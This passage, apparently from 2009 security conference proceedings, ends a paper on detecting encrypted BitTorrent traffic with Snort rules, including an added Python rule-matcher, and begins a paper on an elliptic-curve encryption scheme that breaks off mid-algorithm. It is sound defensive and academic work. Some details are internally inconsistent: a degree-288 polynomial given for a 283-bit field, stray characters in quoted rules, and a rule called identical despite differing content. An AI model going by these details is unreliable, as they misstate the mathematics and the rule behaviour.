great computing power. Usually, the most important feature is the size of the hard disk: when dealing with P2P file sharing programs, transferred files can easily reach a few gigabytes, since they are mostly movies, videos, music albums, games, etc. Real-time network monitoring requires a lot more memory and CPU. Therefore, more recent machines were used for the most critical applications, like the traffic classifier Snort [10], the analysis engine BASE [13] or the packet analyzer Wireshark [14]. As for running P2P software, rather old machines were used, since they served mainly this purpose. The main characteristics of the hardware and software used for the experiments are shown in Table 1. In all practical experiments reported here, Snort was forced to analyse network traffic other than P2P, such as HTTP, Windows Remote Desktop Connection (RDC), SSH, etc. In fact, this was quite worthwhile, since it enabled the testbed to run in circumstances similar to those of deployed P2P classifiers, which also have to deal with network traffic generated by a vast number of applications and correctly identify the P2P traffic among it.

Table 1. Characteristics of hardware and software used for P2P traffic detection

Type | Operating System | CPU | RAM | Software
Workstation | Fedora 9 | Core 2 Duo 2.66 GHz | 1 GB | Snort, Wireshark, BASE, Barnyard, Gtk-Gnutella, Livestation
Workstation | Windows XP SP3 | Pentium III 800 MHz | 512 MB | BitTorrent, eMule, aMule, Limewire, Livestation, TVU Player
Laptop | Windows Vista SP1 / Fedora 10 | Core 2 Duo 2.4 GHz | 3 GB | Wireshark, eMule, TVUPlayer, Livestation
Laptop | MAC OS X (10.5) | Power PC G4 1 GHz | 769 MB | Vuze, Livestation, TVUPlayer
4 BitTorrent Application
4.1 Application Details
BitTorrent application version 6.1.2 was configured so that it would only allow bidirectional encrypted connections, i.e., both outgoing and incoming traffic had to be encrypted for communication with other BitTorrent clients (applications) to be possible. Nowadays, users tend to use these settings to avoid being throttled or blocked by their ISPs. As a consequence, there are not many sources available to download from if one does not use the Forced setting for outgoing encrypted traffic, since other clients are mostly configured to deny legacy connections, thus not allowing unencrypted connections. These settings are configured under the menu Options → Preferences → BitTorrent → Protocol Encryption. To use only encrypted connections, the Outgoing combo box must be set to the value Forced and Allow incoming legacy connections must be unchecked. In all of the following tests, the setting Ask the tracker scrape information, also under Options → Preferences → BitTorrent, was always checked. This enables the client to obtain newer peers and provide statistics about their availability. Although it is not mandatory, especially if other mechanisms such as the DHT are used to obtain peer information, it can be useful to maintain updated records about resource availability. It is important to notice that if this setting is unchecked, there is no BitTorrent tracker request traffic and, consequently, the rules for detecting it are never triggered. In this work, it was kept checked in order to study the frequency of communications with the tracker.
4.2 SNORT Rules and Experiments with Encrypted Traffic
The first two tests were conducted with the previously mentioned settings and with DHT disabled, so that BitTorrent would not generate too much control traffic, which makes it harder to detect. The following rules were triggered and the corresponding test results are provided in Table 2.
Snort Rule 1000301. Rule for detection of traffic generated by BitTorrent application.
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"P2P BitTorrent outbound announce request"; flow:to_server,established; content:"GET"; offset:0; depth:4; content:"/announce"; distance:1; content:"info_hash="; offset:4; content:"event=started"; offset:4; classtype:policy-violation; sid:1000301; rev:1;)
Snort Rule 1000305. Rule for detection of traffic generated by BitTorrent application.
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"LocalRule:P2P BitTorrent outbound - tracker request"; flow:to_server,established; content:"GET"; offset:0; depth:4; content:"/scrape"; distance:1; content:"info_hash="; offset:12; content:"User-Agent:"; offset:80; classtype:policy-violation; sid:1000305; rev:1;)

Table 2. Characteristics of experiments and detection results for BitTorrent application

Date | Start | End | Packets | Bytes | P2P Downloaded | P2P Uploaded | Rule-Count
17-01-2009 | 20:34 | 21:58 | 280791 | 107825488 | 22 MB | 18.4 MB | 1000301-1, 1000305-1
27-01-2009 | 21:31 | 21:44 | 23175 | 10546443 | 1.2 MB | 3.0 MB | 1000301-1, 1000305-1

So, even with DHT disabled, the above two Snort rules for TCP traffic are triggered. In this case, each fired only once, due in part to the small amount of BitTorrent traffic. In the following tests, one can confirm a greater occurrence of them. Once again it is important to emphasize that if Ask the tracker scrape information were unchecked, rule 1000305 would never be triggered at all. For the next tests (see Table 3), four rules were introduced. They refer to DHT traffic and use UDP, unlike the previous ones. Each pair (the first two and the last two rules) could be combined into a single rule. The only advantage in specifying them independently is that it allows distinguishing incoming from outgoing traffic. As one can easily see, enabling the useful DHT feature allows the successful identification of UDP traffic for trackerless requests and trackerless responses.
Snort Rule 1000306. Rule for detection of traffic generated by BitTorrent application.
alert udp $HOME_NET any -> $EXTERNAL_NET any (msg:"LocalRule:P2P BitTorrent UDP - BitTorrent outgoing DHT for trackerless comunication request (d1:ad2:id20)"; content:"d1:ad2:id20"; nocase; depth:11; classtype:policy-violation; sid:1000306; rev:2;)
Snort Rule 1000307. Rule for detection of traffic generated by BitTorrent application.
alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"LocalRule:P2P BitTorrent UDP - BitTorrent incoming DHT for trackerless comunication request (d1:ad2:id20)"; content:"d1:ad2:id20"; nocase; depth:11; classtype:policy-violation; sid:1000307; rev:3;)
Snort Rule 1000308. Rule for detection of traffic generated by BitTorrent application.
alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"LocalRule:P2P BitTorrent UDP - BitTorrent incoming DHT for trackerless comunication response (d1:rd2:id20)"; content:"d1:rd2:id20"; nocase; depth:11; classtype:policy-violation; sid:1000308; rev:3;)
Snort Rule 1000309. Rule for detection of traffic generated by BitTorrent application.
alert udp $HOME_NET any -> $EXTERNAL_NET any (msg:"LocalRule:P2P BitTorrent UDP - BitTorrent outgoing DHT for trackerless comunication response (d1:rd2:id20)"; content:"d1:rd2:id20"; nocase; depth:11; classtype:policy-violation; sid:1000309; rev:3;)
Table 3. Characteristics of an experiment and its detection results for BitTorrent application

Date | Start | End | Packets | Bytes | P2P Downloaded | P2P Uploaded | Rule-Count
01-02-2009 | 23:01 | 23:21 | 71783 | 46023309 | 15 MB | 6.1 MB | 1000301-3, 1000305-2, 1000306-1562, 1000307-689, 1000308-24, 1000309-30
Two additional rules were triggered during the tests on the BitTorrent application. They are available at [15] and are listed below.
Snort Rule 2008581. Rule for detection of traffic generated by BitTorrent application [15].
#http://www.emergingthreats.net/rules/emerging-p2p.rules
#By David Bianco
alert udp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET P2P BitTorrent DHT ping request"; content:"d1n:ad2n:id20n:"; depth:12; nocase; threshold: type both, count 1, seconds 300, track by_src; classtype:policy-violation; reference:url,wiki.theory.org/BitTorrentDraftDHTProtocol; sid:2008581; rev:1;)
Snort Rule 2008584. Rule for detection of traffic generated by BitTorrent application [15].
alert udp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET P2P BitTorrent DHT get_peers request"; content:"d1n:ad2n:id20n:"; nocase; depth:12; content:"9n:info_hash20n:"; nocase; distance:20; depth:14; content:"e1n:q9n:get_peers1n:"; nocase; distance:20; depth:17; threshold: type both, count 1, seconds 300, track by_src; classtype:policy-violation; reference:url,wiki.theory.org/BitTorrentDraftDHTProtocol; sid:2008584; rev:1;)
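As an added illustration of how the content options in these rules select packets, the following Python is a small matcher written for this page; it is not the authors' code and not Snort itself. It parses four of the rules above into ordered content tests and runs them over constructed payloads. The Snort semantics it models (offset/depth as an absolute window from the start of the payload, distance relative to the end of the previous match, nocase as case-insensitive comparison) are a simplified reading; the direction, flow and threshold options are parsed but ignored, |hex| escapes are not supported, and the info_hash, node id and host names are placeholders.

```python
import re

# Rules copied from the paper (sids 1000301/1000305 tracker, 1000306/1000308 DHT).
RULES = [
    'alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"P2P BitTorrent outbound announce request"; '
    'flow:to_server,established; content:"GET"; offset:0; depth:4; content:"/announce"; distance:1; '
    'content:"info_hash="; offset:4; content:"event=started"; offset:4; classtype:policy-violation; '
    'sid:1000301; rev:1;)',
    'alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"LocalRule:P2P BitTorrent outbound - tracker '
    'request"; flow:to_server,established; content:"GET"; offset:0; depth:4; content:"/scrape"; '
    'distance:1; content:"info_hash="; offset:12; content:"User-Agent:"; offset:80; '
    'classtype:policy-violation; sid:1000305; rev:1;)',
    'alert udp $HOME_NET any -> $EXTERNAL_NET any (msg:"LocalRule:P2P BitTorrent UDP - outgoing DHT '
    'request (d1:ad2:id20)"; content:"d1:ad2:id20"; nocase; depth:11; classtype:policy-violation; '
    'sid:1000306; rev:2;)',
    'alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"LocalRule:P2P BitTorrent UDP - incoming DHT '
    'response (d1:rd2:id20)"; content:"d1:rd2:id20"; nocase; depth:11; classtype:policy-violation; '
    'sid:1000308; rev:3;)',
]

# One rule option: keyword, optional ":value" (quoted or up to the next ';'), terminating ';'.
OPTION = re.compile(r'\s*(\w+)(?::\s*("[^"]*"|[^;]*))?;')


def parse_rule(rule):
    """Split a Snort rule into its header and an ordered list of content matchers.
    Only content/offset/depth/distance/nocase are modelled; other options go into meta."""
    header, _, body = rule.partition("(")
    body = body.strip()
    if body.endswith(")"):
        body = body[:-1].strip()
    contents, meta, pos = [], {"header": header.strip()}, 0
    while pos < len(body):
        m = OPTION.match(body, pos)
        if not m:
            raise ValueError("cannot parse option near: " + body[pos:pos + 30])
        key, value = m.group(1), m.group(2)
        pos = m.end()
        if key == "content":
            contents.append({"pattern": value.strip('"').encode(), "nocase": False,
                             "offset": 0, "depth": None, "distance": None})
        elif key in ("offset", "depth", "distance"):
            contents[-1][key] = int(value)       # modifiers bind to the preceding content
        elif key == "nocase":
            contents[-1]["nocase"] = True
        else:
            meta[key] = None if value is None else value.strip().strip('"')
    return {"sid": int(meta["sid"]), "meta": meta, "contents": contents}


def matches(rule, payload):
    """Apply the content tests in order (simplified Snort semantics, see the lead-in):
    offset/depth bound an absolute search window, distance starts the search that many
    bytes after the previous match, and every test must succeed for the rule to fire."""
    prev_end = 0
    for c in rule["contents"]:
        pattern, hay = c["pattern"], payload
        if c["nocase"]:
            pattern, hay = pattern.lower(), hay.lower()
        start = prev_end + c["distance"] if c["distance"] is not None else c["offset"]
        end = start + c["depth"] if c["depth"] is not None else len(hay)
        hit = hay.find(pattern, start, end)      # pattern must lie wholly inside [start, end)
        if hit < 0:
            return False
        prev_end = hit + len(pattern)
    return True


PARSED = [parse_rule(r) for r in RULES]


def scan(payload):
    """Return the sids of all rules whose content signatures fire on one payload."""
    return sorted(r["sid"] for r in PARSED if matches(r, payload))


# Constructed payloads (placeholder hash, node id and host names; not captured traffic).
INFO_HASH = b"%00" * 20                       # URL-encoded 20-byte placeholder info_hash
NODE_ID = b"\x00" * 20                        # placeholder DHT node id
ANNOUNCE = (b"GET /announce?info_hash=" + INFO_HASH + b"&peer_id=CONSTRUCTED&port=6881"
            b"&event=started HTTP/1.1\r\nHost: tracker.invalid\r\n\r\n")
SCRAPE = (b"GET /scrape?info_hash=" + INFO_HASH + b" HTTP/1.1\r\nHost: tracker.invalid\r\n"
          b"User-Agent: constructed/0.1\r\n\r\n")
# KRPC ping and its reply (BEP 5): bencoded dicts whose fixed leading bytes are the signature
# ("d" dict, "1:a" key a, "d" dict, "2:id" key id, "20:" a 20-byte string follows).
DHT_PING = b"d1:ad2:id20:" + NODE_ID + b"e1:q4:ping1:t2:aa1:y1:qe"
DHT_REPLY = b"d1:rd2:id20:" + NODE_ID + b"e1:t2:aa1:y1:re"
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
```

Two details of the rules become visible when the matcher is traced by hand: in rule 1000305, "info_hash=" at offset 12 is exactly where the parameter lands after "GET /scrape?", so the offset is a positional check rather than a search; and the depth:11 on the DHT rules pins "d1:ad2:id20" to the very start of the datagram, which is what keeps a bencoded blob that merely contains those bytes further in from firing the rule.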
Rule 2008581 is identical to the locally developed 1000306. They share some of their content, more exactly d1:ad2:id20. Even so, rule 1000306 triggered 614 times against a single one for 2008581. With these additional rules included and the DHT features enabled, the results presented in Table 4 were obtained.

Table 4. Characteristics of an experiment and its detection results for BitTorrent application

Date | Start | End | Packets | Bytes | P2P Downloaded | P2P Uploaded | Rule-Count
03-02-2009 | 20:47 | 20:59 | 20434 | 8642013 | 147.1 KB | 3.4 MB | 1000301-3, 1000305-3, 1000306-614, 1000307-222, 1000308-17, 1000309-11, 2008581-1, 2008584-1
Another test was conducted in the same circumstances as the previous one, but generating a bit more traffic. For this, a torrent file for a drama movie released in 2008 was selected. The results obtained are listed in Table 5.

Table 5. Characteristics of an experiment and its detection results for BitTorrent application

Date | Start | End | Packets | Bytes | P2P Downloaded | P2P Uploaded | Rule-Count
07-02-2009 | 19:53 | 22:57 | 231536 | 134571450 | 63.5 MB | 46.7 MB | 1000301-2, 1000305-2, 1000306-8423, 1000307-4258, 1000308-57, 1000309-31
As one can see, rules 1000306, 1000307, 1000308 and 1000309 are triggered much more often than 1000301 and 1000305. This is because when DHT is enabled, peers communicate frequently with each other to check for data and peer availability. As for rule 1000301, it is only triggered when a peer tells another that it is interested in some file shared by it, and this usually occurs only just before beginning the download of another chunk. If the scrape feature is disabled, through the Ask the tracker scrape information option, rule 1000305 is not triggered at all, since communication with the tracker with the scrape content does not occur.
5 Conclusions
This paper describes the use of a deep packet inspection method based on signatures coded as Snort rules for the detection of encrypted P2P traffic generated by the BitTorrent application. Several lab experiments were carried out to validate the proposed method and to evaluate its accuracy. As future work, we intend to integrate this method as part of a hybrid method that also considers a flow-based method based on entropy [5], to work under high speed (1-10 Gbps) and low latency.
Acknowledgments. This work has been partially funded by the Portuguese Fundação para a Ciência e a Tecnologia through the TRAMANET Project, contract PTDC/EIA/73072/2006.
References
1. PeerApp: Comparing P2P Solutions (2007), http://www.peerapp.com/docs/ComparingP2P.pdf
2. Madhukar, A., Williamson, C.: A Longitudinal Study of P2P Traffic Classification. In: 14th IEEE International Symposium on Modeling, Analysis, and Simulation of Computer and Telecommunication Systems (MASCOTS 2006), pp. 179–188. IEEE Press, New York (2006)
3. Guo, Z., Qiu, Z.: Identification Peer-to-Peer Traffic for High Speed Networks Using Packet Sampling and Application Signatures. In: 9th International Conference on Signal Processing (ICSP 2008), pp. 2013–2019. IEEE Press, New York (2008)
4. Liu, H., Feng, W., Huang, Y., Li, X.: A Peer-To-Peer Traffic Identification Method Using Machine Learning. In: International Conference on Networking, Architecture, and Storage (NAS 2007), pp. 155–160. IEEE Press, New York (2007)
5. Gomes, J., Inacio, P., Freire, M., Pereira, M., Monteiro, P.: Analysis of Peer-to-Peer Traffic Using a Behavioural Method Based on Entropy. In: IEEE International Performance, Computing and Communications Conference (IPCCC 2008), pp. 201–208. IEEE Press, New York (2008)
6. Soysal, M., Schmidt, E.G.: An accurate evaluation of machine learning algorithms for flow-based P2P traffic detection. In: 22nd International Symposium on Computer and Information Sciences (ISCIS 2007), pp. 1–6. IEEE Press, New York (2007)
7. Gonzalez-Castano, F.J., Rodriguez-Hernandez, P.S., Martinez-Alvarez, R.P., Gomez, A., Lopez-Cabido, I., Villasuso-Barreiro, J.: Support Vector Machine Detection of Peer-to-Peer Traffic. In: IEEE International Conference on Computational Intelligence for Measurement Systems and Applications, pp. 103–108. IEEE Press, New York (2006)
8. Gao, Z., Lu, G., Gu, D.: A Novel P2P Traffic Identification Scheme Based on Support Vector Machine Fuzzy Network. In: Second International Workshop on Knowledge Discovery and Data Mining (WKDD 2009), pp. 909–912. IEEE Press, New York (2009)
9. Raahemi, B., Kouznetsov, A., Hayajneh, A., Rabinovitch, P.: Classification of Peer-to-Peer traffic using incremental neural networks (Fuzzy ARTMAP). In: Canadian Conference on Electrical and Computer Engineering (CCECE 2008), pp. 719–724. IEEE Press, New York (2008)
10. Snort, http://www.snort.org
11. Spognardi, A., Lucarelli, A., Di Pietro, R.: A Methodology for P2P File-sharing Traffic Detection. In: Second International Workshop on Hot Topics in Peer-to-Peer Systems (HOT-P2P 2005), pp. 52–61. IEEE Press, New York (2005)
12. Smoothwall open source project, http://www.smoothwall.org
13. Basic analysis and security engine (BASE), http://base.secureideas.net
14. Wireshark, http://www.wireshark.org
15. Emerging threats, http://www.emergingthreats.net/rules/emerging-p2p.rules
A Simple Encryption Scheme for Binary Elliptic Curves
Brian King
Purdue School of Engineering & Technology, Indiana University Purdue University Indianapolis
[email protected]
Abstract. In this work, we discuss elliptic curves defined over binary fields (curves defined over $\mathbb{F}_{2^n}$). We introduce a simple public-key encryption scheme for binary elliptic curves and demonstrate that this encryption scheme is as secure as the EC El Gamal cryptosystem. The basis of the encryption scheme is an isomorphism between binary elliptic curves. This same isomorphism can be used as an implementation tool (to reduce the computational complexity).
1 Introduction
In many situations, public key encryption is necessary to deliver "small messages" or to deliver the encryption keys of content encrypted with symmetric cryptosystems. Elliptic Curve Cryptography is a common public-key encryption system that is used for applications where bandwidth is a concern. An example of an elliptic curve public-key cryptosystem is Elliptic Curve El Gamal. In this case, the message has to be a point on the elliptic curve. Initially, the problem of encrypting a message would require running a probabilistic message mapping method [10].¹ In this work we describe a simple encryption scheme defined over binary elliptic curves. In our encryption scheme, message mapping is straightforward and deterministic. Further, we demonstrate that our encryption scheme is as secure as the EC El Gamal cryptosystem [5]. Our encryption system requires an Elliptic Curve Diffie-Hellman calculation, the application of an isomorphism (between binary elliptic curves), and then a field multiplication.
¹ Here the message m would be mapped to an x-coordinate of the prime subgroup of the elliptic curve. If m was not an x-coordinate of such a point, one would modify m, in an iterative and deterministic way, until the result is an x-coordinate of a point of the prime subgroup of the elliptic curve. One then uses the resulting elliptic curve point in the encryption. The receiver on the other side, after decryption, will need to go through a similar iterative process (in reverse) to find the message [10].
D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 273–280, 2009. © Springer-Verlag Berlin Heidelberg 2009
2 Background
2.1 The Trace Function in $\mathbb{F}_{2^n}$
The trace function, denoted by $\mathrm{Tr}$, is a mapping of $\mathbb{F}_{2^n}$ onto $\mathbb{Z}_2$ such that $\mathrm{Tr}(\alpha + \beta) = \mathrm{Tr}(\alpha) + \mathrm{Tr}(\beta)$. The trace of an element $\alpha \in \mathbb{F}_{2^n}$ can be computed as $\mathrm{Tr}(\alpha) = \sum_{i=0}^{n-1} \alpha^{2^i}$ [3]. In most binary fields $\mathbb{F}_{2^n}$ that are used for elliptic curve cryptography, the trace can be computed by examining "a few bits of the field element". For example, in the Galois field $\mathbb{F}_{2^{283}}$ with generating polynomial $t^{288} + t^{12} + t^{7} + t^{5} + 1$, for $\mu \in \mathbb{F}_{2^{283}}$ the trace can be computed as $\mathrm{Tr}(\mu) = \mu_0 + \mu_{277}$, where $\mu = \mu_{277} u^{277} + \cdots + \mu_1 u + \mu_0$ using a polynomial basis to represent field elements. In addition to the linearity property, the trace function satisfies $\mathrm{Tr}(\alpha^2) = \mathrm{Tr}(\alpha)$. Further, when n is odd, $\mathrm{Tr}(1) = 1$. Due to an attack, it is recommended that whenever one uses an elliptic curve defined over $\mathbb{F}_{2^n}$, n should be prime. Consequently, for all $\alpha \in \mathbb{F}_{2^n}$, $\mathrm{Tr}(\alpha + 1) = \mathrm{Tr}(\alpha) + 1$. For $b \in \mathbb{F}_{2^n}$, the quadratic equation $\lambda^2 + \lambda = b$ in $\mathbb{F}_{2^n}$ has a solution if and only if $\mathrm{Tr}(b) = 0$ [3]. Therefore, whenever $\lambda$ is a solution to the above quadratic equation, $\lambda + 1$ is also a solution. Recall $\mathrm{Tr}(\lambda + 1) = \mathrm{Tr}(\lambda) + 1$. Thus, when n is odd, for each solvable quadratic equation there is a solution with trace 1 and a solution with trace 0. A solution to the quadratic equation $\lambda^2 + \lambda = b$ can be computed efficiently by $\lambda = \sum_{j=0}^{(n-1)/2} b^{2^{2j}}$ [1]. In this work, we use Solve(s) to denote an algorithm which returns a solution to the quadratic equation $\lambda^2 + \lambda = s$. Solve(s) returns No solution whenever $\mathrm{Tr}(s) \neq 0$. If a solution exists then, since there are two solutions, it returns an arbitrary one of them.
2.2 Elliptic Curves Defined over $\mathbb{F}_{2^n}$
The standard equation for a non-supersingular elliptic curve defined over the finite field $\mathbb{F}_{2^n}$ is

$$y^2 + xy = x^3 + ax^2 + b \qquad (1)$$

where $a, b \in \mathbb{F}_{2^n}$, $b \neq 0$. The points $P = (x, y)$ with $x, y \in \mathbb{F}_{2^n}$ that satisfy equation (1), together with the point $\mathcal{O}$, called the point at infinity, form the additive abelian group $E_{a,b}$. The addition within $E_{a,b}$ is defined as follows. For all $P_1, P_2 \in E_{a,b}$:
1. $P_1 + \mathcal{O} = P_1$;
2. for $P_1 = (x_1, y_1) \neq \mathcal{O}$, the point $-P_1$ is computed as $-P_1 = (x_1, x_1 + y_1)$;
3. for all $P_1 = (x_1, y_1)$, $P_2 = (x_2, y_2)$ where $P_1 \neq \mathcal{O}$, $P_2 \neq \mathcal{O}$ and $P_1 \neq -P_2$, the point $P_1 + P_2$ is computed as $P_1 + P_2 = P_3 = (x_3, y_3)$, where $x_3, y_3 \in \mathbb{F}_{2^n}$ satisfy $x_3 = \lambda^2 + \lambda + x_1 + x_2 + a$ and $y_3 = \lambda(x_1 + x_3) + x_3 + y_1$, with $\lambda = \frac{y_1 + y_2}{x_1 + x_2}$ if $P_1 \neq P_2$ and $\lambda = x_1 + \frac{y_1}{x_1}$ if $P_1 = P_2$.
The elliptic curve $E_{a,b}$ is selected so that $E_{a,b}$ contains a large subgroup of prime order. The cryptographically relevant points will be non-trivial elements of the subgroup of large prime order.
A Simple Encryption Scheme for Binary Elliptic Curves
If $(x, y) \in E_{a,b}$ and $x \neq 0$ then $\frac{y^2}{x^2} + \frac{y}{x} = x + a + \frac{b}{x^2}$. Let $z = \frac{y}{x}$; then we see that $z^2 + z = x + a + \frac{b}{x^2}$. Since this quadratic equation is solvable, we see that $\mathrm{Tr}(x + a + \frac{b}{x^2}) = 0$. In [8], Seroussi demonstrated that a necessary condition for a point $P = (x_1, y_1) \in E_{a,b}$ to belong to the prime subgroup of $E_{a,b}$ is that $\mathrm{Tr}(x_1) = \mathrm{Tr}(a)$. Thus a field element $\alpha \in \mathbb{F}_{2^n}$ is the $x$-coordinate of a point that belongs to the prime subgroup of $E_{a,b}$ if and only if $\mathrm{Tr}(\alpha + a + \frac{b}{\alpha^2}) = 0$ and $\mathrm{Tr}(\frac{b}{\alpha^2}) = 0$.

2.3 Isomorphisms of Binary Elliptic Curves
We now make a series of recollections and observations concerning the elliptic curve parameters that define the elliptic curve in equation (1). The following result is provided in [9, 1].

Theorem 1. [9, 1] Let $\gamma \in \mathbb{F}_{2^n}$ be such that $\mathrm{Tr}(\gamma) = 0$. Then for all $a, b$ we have $|E_{a+\gamma,b}| = |E_{a,b}|$.

In [9], it was shown that the curves $E_{a+\gamma,b}$ and $E_{a,b}$ are isomorphic to each other when $\mathrm{Tr}(\gamma) = 0$.

Theorem 2. [9] Suppose $\gamma \in \mathbb{F}_{2^n}$ is such that $\mathrm{Tr}(\gamma) = 0$. Then $E_{a+\gamma,b}$ and $E_{a,b}$ are isomorphic. Further, the map $f : E_{a+\gamma,b} \longrightarrow E_{a,b}$ where $f(\mathcal{O}) = \mathcal{O}$ and, for all $(x, y) \in E_{a+\gamma,b}$, $f(x, y) = (x, y + x \cdot \mathrm{Solve}(\gamma))$ is an isomorphism.

Let $S$ denote $\mathrm{Solve}(\gamma)$. Then by Theorem 2, $E_{a,b}$ and $E_{a+\gamma,b}$ are isomorphic, where the isomorphism is $f(x, y) = (x, y + x \cdot S)$. Further, the inverse map $f^{-1}$ satisfies $f^{-1}(\tilde{x}, \tilde{y}) = (\tilde{x}, \tilde{y} + \tilde{x} \cdot S)$. A consequence of this theorem is that if $E_{a,b}$ represents a cryptographically secure elliptic curve defined over $\mathbb{F}_{2^n}$, then there exist $2^{n-1}$ cryptographically secure curves defined over the same field that are "equivalent" (this follows from the fact that half of the field elements of $\mathbb{F}_{2^n}$ have trace zero). Also, observe that if one needed to compute the scalar multiple $kG$ for $G \in E_{a,b}$, then one can compute the scalar multiple $kf(G)$ in $E_{a+\gamma,b}$. Once $kf(G)$ has been computed, since $kf(G) = f(kG)$, we can compute $kG$ by $kG = f^{-1}(kf(G))$. Thus if $(\tilde{x}, \tilde{y}) = kf(G)$, then $kG = (\tilde{x}, \tilde{y} + \tilde{x} \cdot S)$. The extra cost of computing $kG$ via $kf(G)$ (outside of the scalar arithmetic) is the cost of computing $f(G)$, which requires one field multiplication, the cost of computing $f^{-1}(kf(G))$, which requires one field multiplication, and the cost of computing $S = \mathrm{Solve}(\gamma)$. The reason to do this is that the computational complexity of computing a scalar multiple may be smaller when using the elliptic curve $E_{a+\gamma,b}$. This would occur if one was using a projective point implementation to compute the scalar multiple of a point.

2.4 An Application of the Isomorphism
Let $M$ be an arbitrary element of $\mathbb{F}_{2^n}$. How could $M$ be embedded into an elliptic curve point? It is very unlikely that there exists some $x$ such that $(x, M) \in G$ (here $G$ denotes the prime subgroup of $E_{a,b}$). It is also unlikely that there exists some $y$ such that $(M, y) \in G$. When elliptic curve cryptography was first proposed for use as a public-key encryption method, the task of mapping a message to a point on the elliptic curve was reduced to using a probabilistic method of mapping the message to an elliptic curve point. However, this does not impact the use of elliptic curves for cryptographic purposes, because the typical applications of elliptic curve cryptography are key agreement, digital signatures and the encryption of data via a hybrid encryption method such as ECIES [11]. Our interest is to construct an encryption scheme using ECC, so we are not concerned with mapping messages to an elliptic curve, but rather with the mathematics that we can exploit. To this end, let $P_1 = (x_1, y_1)$ be a point of the prime subgroup $G$ of $E_{a,b}$. Since $P_1 \in E_{a,b}$ we know that $\mathrm{Tr}(x_1 + a + \frac{b}{x_1^2}) = 0$. Observe that

$$\mathrm{Tr}\!\left(\frac{M^2}{x_1^2} + \frac{M}{x_1} + x_1 + a + \frac{b}{x_1^2}\right) = \mathrm{Tr}\!\left(\frac{M^2}{x_1^2} + \frac{M}{x_1}\right) + \mathrm{Tr}\!\left(x_1 + a + \frac{b}{x_1^2}\right) = \mathrm{Tr}\!\left(\frac{M^2}{x_1^2}\right) + \mathrm{Tr}\!\left(\frac{M}{x_1}\right) + 0 = 0,$$

since for all field elements $\alpha$ we have $\mathrm{Tr}(\alpha^2) = \mathrm{Tr}(\alpha)$. Let $\gamma = \frac{M^2}{x_1^2} + \frac{M}{x_1} + x_1 + a + \frac{b}{x_1^2}$. Then $\mathrm{Tr}(\gamma) = 0$. Hence $E_{a,b}$ is isomorphic to $E_{a+\gamma,b}$. Therefore $E_{a+\gamma,b}$ has a prime subgroup isomorphic to $G$ of $E_{a,b}$. Now the ordered pair $(x_1, M)$ satisfies $\frac{M^2}{x_1^2} + \frac{M}{x_1} + x_1 + a + \gamma + \frac{b}{x_1^2} = 0$. Thus $(x_1, M) \in E_{a+\gamma,b}$. Further, $\mathrm{Tr}(x_1) = \mathrm{Tr}(a) = \mathrm{Tr}(a + \gamma)$. Due to a result by Seroussi [8], $(x_1, M)$ belongs to the prime subgroup of $E_{a+\gamma,b}$.

2.5 Elliptic Curve El Gamal Public-Key Encryption (EC El Gamal)
A method that allows one to use an elliptic curve as a public-key encryption system is EC El Gamal encryption. Suppose there exists a message $X$, where $X \in E_{a,b}$ and $X$ belongs to the prime subgroup. Let $G$ be a generator of the prime subgroup of $E_{a,b}$ and suppose this prime subgroup has order $q$. Now suppose Alice possesses $X$ and would like to privately send it to Bob using EC El Gamal. Alice gets Bob's public key $Y_{bob}$ (where $Y_{bob} = k_{bob} G$ and $k_{bob}$ is Bob's private key). Alice then selects a random integer $r$ in $\mathbb{Z}_q$, computes $rG$ and sets $C_1 = rG$. Alice then computes $C_2 = rY_{bob} + X$. Alice then sends the ciphertext $(C_1, C_2)$ to Bob. Bob decrypts $(C_1, C_2)$ by computing $C_2 - k_{bob} C_1$, which is the message $X$.
3 Applying the Isomorphism to Create an Encryption Scheme
We now introduce a novel encryption scheme. We assume that $E_{a,b}$ is a cryptographically secure elliptic curve defined over $\mathbb{F}_{2^n}$, and that $G$ is a generator of the prime subgroup of $E_{a,b}$, where this prime subgroup has order $q$. Suppose the message $M \in \mathbb{F}_{2^n}$ and Alice would like to send this message to Bob. To transmit $M$ to Bob, Alice does the following. She retrieves Bob's public key $Y_{pub,bob}$ and certificate $\mathrm{CERT}_{bob}$. Alice verifies the validity of Bob's public key $Y_{pub,bob}$ using the certificate $\mathrm{CERT}_{bob}$. Upon verification, Alice selects $r$ from $\mathbb{Z}_q$, takes $Y_{pub,bob}$ and computes $rY_{pub,bob} = (x_{bob}, y_{bob})$. Now consider the ordered pair $(x_{bob}, M)$; we will show that this belongs to a cryptographically secure elliptic curve that is isomorphic to $E_{a,b}$. Observe that since $(x_{bob}, y_{bob})$ belongs to the subgroup of $E_{a,b}$ of prime order, $x_{bob} \neq 0$ (if it were $0$ then this would be a point of two-torsion). Thus $x_{bob}^{-1}$ exists. Let $s = \frac{M + y_{bob}}{x_{bob}}$. Set $\gamma = s^2 + s$; then $\mathrm{Tr}(\gamma) = 0$. Consequently, the curve $E_{a,b}$ is isomorphic to $E_{a+\gamma,b}$ by the mapping $(x, y) \to (x, y + x \cdot s)$, since $s$ is a solution returned by $\mathrm{Solve}(\gamma)$. Consider applying this mapping to the point $(x_{bob}, y_{bob})$; the image will be $(x_{bob}, y_{bob} + x_{bob} \cdot s)$, and $(x_{bob}, y_{bob} + x_{bob} \cdot s) = (x_{bob}, y_{bob} + x_{bob} \cdot \frac{M + y_{bob}}{x_{bob}}) = (x_{bob}, M)$. Let $f$ denote this mapping; then from $rY_{pub,bob} = (x_{bob}, y_{bob})$ we have $f(rY_{pub,bob}) = rf(Y_{pub,bob}) = f((x_{bob}, y_{bob})) = (x_{bob}, M)$. Alice sends $(c_1, c_2) = (rG, s)$ to Bob. This is summarized in the following algorithm.

Algorithm 1. Alice encrypting message $M$ using the simple encryption scheme
1: Alice selects $r \in_R \mathbb{Z}_q^*$ randomly.
2: Alice computes $rG$.
3: Alice retrieves Bob's certificate $\mathrm{CERT}_{Bob}$ and verifies its authenticity.
